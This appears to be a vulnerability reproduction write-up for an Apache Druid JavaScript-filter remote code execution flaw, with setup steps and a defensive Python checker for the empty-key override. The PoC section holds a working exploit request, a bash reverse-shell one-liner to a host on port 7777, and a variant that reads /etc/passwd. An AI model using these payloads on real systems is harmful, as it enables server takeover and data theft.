Vulnerability description
Although the official description says authentication is required, that authentication mechanism is not enabled by default, so in practice this is an RCE under the default configuration.
Environment setup
wget https://mirrors.bfsu.edu.cn/apache/druid/0.19.0/apache-druid-0.19.0-bin.tar.gz
tar zxf apache-druid-0.19.0-bin.tar.gz
cd apache-druid-0.19.0
bin/start-micro-quickstart
# To stop it, just press CTRL+C
The router port is set in:
conf/druid/single-server/micro-quickstart/router/runtime.properties
Change the default 8888 to another port.
Starting the micro quickstart also starts a ZooKeeper on port 2181 by default; change that in:
vi conf/zk/zoo.cfg
If another application already occupies port 2181 and you moved Druid's bundled ZooKeeper to a different port, you need to set a variable before starting:
export DRUID_SKIP_PORT_CHECK=1
Other components also exited because their default ports were taken; change their default ports as well:
[cqq@localhost micro-quickstart]$ grep -rn "druid.plaintextPort" *
broker/runtime.properties:21:druid.plaintextPort=8082
coordinator-overlord/runtime.properties:21:druid.plaintextPort=8081
historical/runtime.properties:21:druid.plaintextPort=8083
middleManager/runtime.properties:21:druid.plaintextPort=8091
router/runtime.properties:21:druid.plaintextPort=8889
[cqq@localhost micro-quickstart]$ pwd
/home/cqq/repos/apache-druid-0.19.0/conf/druid/single-server/micro-quickstart
Before the ports were changed, the other components failed to start and the UI looked like this:
After the other components start successfully,
port listening status:
UI status:
Debug configuration:
vi apache-druid-0.19.0/conf/druid/single-server/micro-quickstart/coordinator-overlord/jvm.config
Add as the last line (note that a bare address=12346 listens on all interfaces on JDK 8, while JDK 9 and later bind it to localhost unless you write address=*:12346):
-Xrunjdwp:transport=dt_socket,suspend=n,server=y,address=12346
Analysis
By default, executing user-supplied JS code is disallowed:
The trick here is that
"": {"enabled": true}
sets the enabled property of the JavaScriptConfig object to true, overriding the system default of false and turning JS execution on.
After that it is just the usual flow of calling Java code from JS.
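As an added defensive example (not code from the original post or from the Apache Druid project): a small Python checker that walks a sampler or ingestion spec and reports any object that is a javascript filter/parser and any object carrying the empty-key JavaScriptConfig override with enabled=true. A WAF rule or a proxy log parser can run it over request bodies sent to the indexer endpoints. The two sample bodies are constructed here; their JavaScript function is a harmless placeholder and only the structure mirrors the request shown on this page.

```python
"""Flag Druid sampler / ingestion specs that smuggle in the empty-key
JavaScriptConfig override.  Added example for this post; not code from the
original post or from the Apache Druid project."""
from __future__ import annotations

import json
import sys
from typing import Any, Iterator

OVERRIDE_REASON = "empty-key JavaScriptConfig override with enabled=true"
JS_REASON = "javascript filter/parser component"


def walk(node: Any, path: str = "$") -> Iterator[tuple[str, Any]]:
    """Yield (json_path, value) for every node of a parsed JSON document."""
    yield path, node
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk(value, f'{path}["{key}"]')
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk(value, f"{path}[{index}]")


def _is_true(value: Any) -> bool:
    # Both the boolean true and the string "true" appear in the payloads
    # shown on this page, so accept either spelling.
    return value is True or (isinstance(value, str) and value.strip().lower() == "true")


def find_js_override(body: str) -> list[dict[str, str]]:
    """Return one finding per suspicious object in a JSON request body.

    Non-JSON bodies yield no findings; the caller decides how to treat those.
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    findings: list[dict[str, str]] = []
    for path, node in walk(doc):
        if not isinstance(node, dict):
            continue
        if node.get("type") == "javascript" or node.get("format") == "javascript":
            findings.append({"path": path, "reason": JS_REASON})
        override = node.get("")
        if isinstance(override, dict) and _is_true(override.get("enabled")):
            findings.append({"path": path, "reason": OVERRIDE_REASON})
    return findings


def is_suspicious(body: str) -> bool:
    """True when the empty-key override appears anywhere in the body.

    No legitimate spec carries a "" key, so the override alone is decisive;
    the javascript component findings are kept for context in the report.
    """
    return any(f["reason"] == OVERRIDE_REASON for f in find_js_override(body))


# Constructed sample bodies (not captured traffic).  The JavaScript function
# is a harmless placeholder; the structure mirrors the sampler request.
SAMPLE_OVERRIDE = json.dumps({
    "type": "index",
    "spec": {
        "ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{}"}},
        "dataSchema": {
            "dataSource": "sample",
            "timestampSpec": {"column": "timestamp", "format": "iso"},
            "transformSpec": {
                "filter": {
                    "type": "javascript",
                    "dimension": "test",
                    "function": "function(value) { return true }",
                    "": {"enabled": True},
                }
            },
        },
    },
})

SAMPLE_BENIGN = json.dumps({
    "type": "index",
    "spec": {
        "dataSchema": {
            "dataSource": "sample",
            "transformSpec": {"filter": {"type": "selector", "dimension": "test", "value": "x"}},
        }
    },
})


if __name__ == "__main__":
    # Usage: python druid_js_override_check.py < request_body.json
    for finding in find_js_override(sys.stdin.read()):
        print(f"{finding['reason']} at {finding['path']}")
```

The checker keys on the empty-string property rather than on the word `javascript` alone, because a javascript filter in a spec is legitimate on a cluster where the operator enabled JS on purpose; the `""` key is what has no business in any spec.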
PoC
POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.85.130:8888
Content-Type: application/json;charset=utf-8
Content-Length: 587
Connection: close
{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"timestamp\":\"2020-12-12T12:10:21.040Z\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "test", "function": "function(value) {java.lang.Runtime.getRuntime().exec('calc')}", "": {"enabled": true}}}}}}
For a reverse shell, change the command to:
/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.85.1/7777 0>&1
Variant with the command output echoed back:
{
  "type": "index",
  "spec": {
    "ioConfig": {
      "type": "index",
      "firehose": {
        "type": "local",
        "baseDir": "/etc",
        "filter": "passwd"
      }
    },
    "dataSchema": {
      "dataSource": "%%DATASOURCE%%",
      "parser": {
        "parseSpec": {
          "format": "javascript",
          "timestampSpec": {},
          "dimensionsSpec": {},
          "function": "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"2013-09-01T12:41:27Z\",test: s}}",
          "": {
            "enabled": "true"
          }
        }
      }
    }
  }
}
References
- https://mp.weixin.qq.com/s/McAoLfyf_tgFIfGTAoRCiw
- https://seclists.org/oss-sec/2021/q1/87
- https://druid.apache.org/docs/latest/tutorials/index.html
- https://github.com/apache/druid/issues/2434
- https://druid.apache.org/docs/latest/operations/api-reference.html#broker